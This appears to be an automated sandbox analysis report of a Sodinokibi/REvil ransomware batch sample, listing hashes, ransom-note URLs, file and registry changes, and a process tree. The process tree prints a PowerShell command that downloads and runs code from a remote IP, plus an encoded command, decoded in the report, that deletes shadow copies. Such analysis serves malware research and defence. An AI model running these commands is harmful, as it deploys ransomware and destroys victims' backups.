Analysis
max time kernel: 148s
max time network: 179s
platform: windows7_x64
resource: win7v200430
submitted: 17-05-2020 00:10

Static task static1
Behavioral task behavioral1: sample eb472e31443cc485f086281fcb7b51d3.bat, resource win7v200430
Behavioral task behavioral2: sample eb472e31443cc485f086281fcb7b51d3.bat, resource win10v200430
General
Target: eb472e31443cc485f086281fcb7b51d3.bat
Size: 216B
MD5: 0bf53bc18c108f0a372946b0adb06fea
SHA1: efac9fc02b506eeff1a25bd81b597fd063766f24
SHA256: 5802b2494c7607bf862d8841fe92368c8adf31ae02c37308c62053c1a3d13888
SHA512: 88403419d3dd18dfb06e613f3686aec3d202a8e0f64f0e6025ac789cd9ae3e7efc6c8e6cc95e83f2a1cbc87ae74da08c730cdfba96cda83868ee70f7442bdb08
Malware Config
Extracted from: http://185.103.242.78/pastes/eb472e31443cc485f086281fcb7b51d3

Extracted from: C:\908452242-read-me.txt
Family: sodinokibi
URLs:
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/B7383768CA47FD80
http://decryptor.cc/B7383768CA47FD80
Signatures

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
pid | process
1472 | powershell.exe

Drops file in System32 directory 1 IoCs
Processes:
description | ioc | process
File opened for modification | C:\Windows\System32\CatRoot2\dberr.txt | powershell.exe
Suspicious behavior: EnumeratesProcesses 77 IoCs
Blacklisted process makes network request 79 IoCs
Enumerates connected drives 3 TTPs

Modifies service 2 TTPs 4 IoCs
Processes:
description | ioc | process
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer | vssvc.exe
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer | vssvc.exe
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer | vssvc.exe
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer | vssvc.exe

Drops file in Program Files directory 22 IoCs
Processes:
description | ioc | process
File opened for modification | \??\c:\program files\ConnectInvoke.otf | powershell.exe
File opened for modification | \??\c:\program files\RepairUninstall.doc | powershell.exe
File opened for modification | \??\c:\program files\ResumeUnregister.jfif | powershell.exe
File opened for modification | \??\c:\program files\SkipStart.ex_ | powershell.exe
File opened for modification | \??\c:\program files\WatchShow.midi | powershell.exe
File created | \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\908452242-read-me.txt | powershell.exe
File opened for modification | \??\c:\program files\UseDebug.asp | powershell.exe
File created | \??\c:\program files\908452242-read-me.txt | powershell.exe
File opened for modification | \??\c:\program files\DisableRedo.asp | powershell.exe
File opened for modification | \??\c:\program files\MeasureDisable.otf | powershell.exe
File opened for modification | \??\c:\program files\NewLock.m4a | powershell.exe
File opened for modification | \??\c:\program files\RestartExit.mp4v | powershell.exe
File opened for modification | \??\c:\program files\SetWatch.mpeg | powershell.exe
File created | \??\c:\program files\microsoft sql server compact edition\v3.5\908452242-read-me.txt | powershell.exe
File created | \??\c:\program files (x86)\908452242-read-me.txt | powershell.exe
File opened for modification | \??\c:\program files\ConnectRevoke.pps | powershell.exe
File created | \??\c:\program files\microsoft sql server compact edition\908452242-read-me.txt | powershell.exe
File opened for modification | \??\c:\program files\OptimizeUninstall.vsdx | powershell.exe
File opened for modification | \??\c:\program files\SuspendLock.mp2 | powershell.exe
File opened for modification | \??\c:\program files\WaitMove.rmi | powershell.exe
File opened for modification | \??\c:\program files\SelectBackup.wma | powershell.exe
File opened for modification | \??\c:\program files\TraceRemove.png | powershell.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
description | ioc | process
Set value (str) | \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\z0w.bmp" | powershell.exe

Suspicious use of WriteProcessMemory 5 IoCs
Processes:
description | pid | process | target process
PID 1388 wrote to memory of 1472 | 1388 | cmd.exe | powershell.exe
PID 1472 wrote to memory of 1656 | 1472 | powershell.exe | powershell.exe
PID 1472 wrote to memory of 1656 | 1472 | powershell.exe | powershell.exe
PID 1472 wrote to memory of 1656 | 1472 | powershell.exe | powershell.exe
PID 1472 wrote to memory of 1656 | 1472 | powershell.exe | powershell.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
description | pid | process
Token: SeDebugPrivilege | 1472 | powershell.exe
Token: SeDebugPrivilege | 1472 | powershell.exe
Token: SeDebugPrivilege | 1656 | powershell.exe
Token: SeBackupPrivilege | 1976 | vssvc.exe
Token: SeRestorePrivilege | 1976 | vssvc.exe
Token: SeAuditPrivilege | 1976 | vssvc.exe
Token: SeTakeOwnershipPrivilege | 1472 | powershell.exe

Modifies system certificate store
Processes:
description | ioc | process
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 | powershell.exe
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = (blob data not captured) | powershell.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 | powershell.exe
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = (blob data not captured) | powershell.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\58119F0E128287EA50FDD987456F4F78DCFAD6D4 | powershell.exe
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\58119F0E128287EA50FDD987456F4F78DCFAD6D4\Blob = (blob data not captured) | powershell.exe
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\6631BF9EF74F9EB6C9D5A60CBA6ABED1F7BDEF7B\Blob = (blob data not captured) | powershell.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C | powershell.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\6631BF9EF74F9EB6C9D5A60CBA6ABED1F7BDEF7B | powershell.exe
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = (blob data not captured) | powershell.exe
Family: Sodin, Sodinokibi, REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
Processes

Level 1: C:\Windows\system32\cmd.exe
  Command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\eb472e31443cc485f086281fcb7b51d3.bat"
  PID: 1388
  - Suspicious use of WriteProcessMemory

  Level 2: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/eb472e31443cc485f086281fcb7b51d3');Invoke-WLKBSGRGV;Start-Sleep -s 10000"
    PID: 1472
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Blacklisted process makes network request
    - Drops file in Program Files directory
    - Sets desktop wallpaper using registry
    - Suspicious use of WriteProcessMemory
    - Suspicious use of AdjustPrivilegeToken
    - Modifies system certificate store

    Level 3: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      (the -e argument is base64-encoded UTF-16LE for: Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();} , i.e. deletion of volume shadow copies, which explains the vssvc.exe activity below)
      PID: 1656
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

Level 1: C:\Windows\system32\vssvc.exe
  Command line: C:\Windows\system32\vssvc.exe
  PID: 1976
  - Modifies service
  - Suspicious use of AdjustPrivilegeToken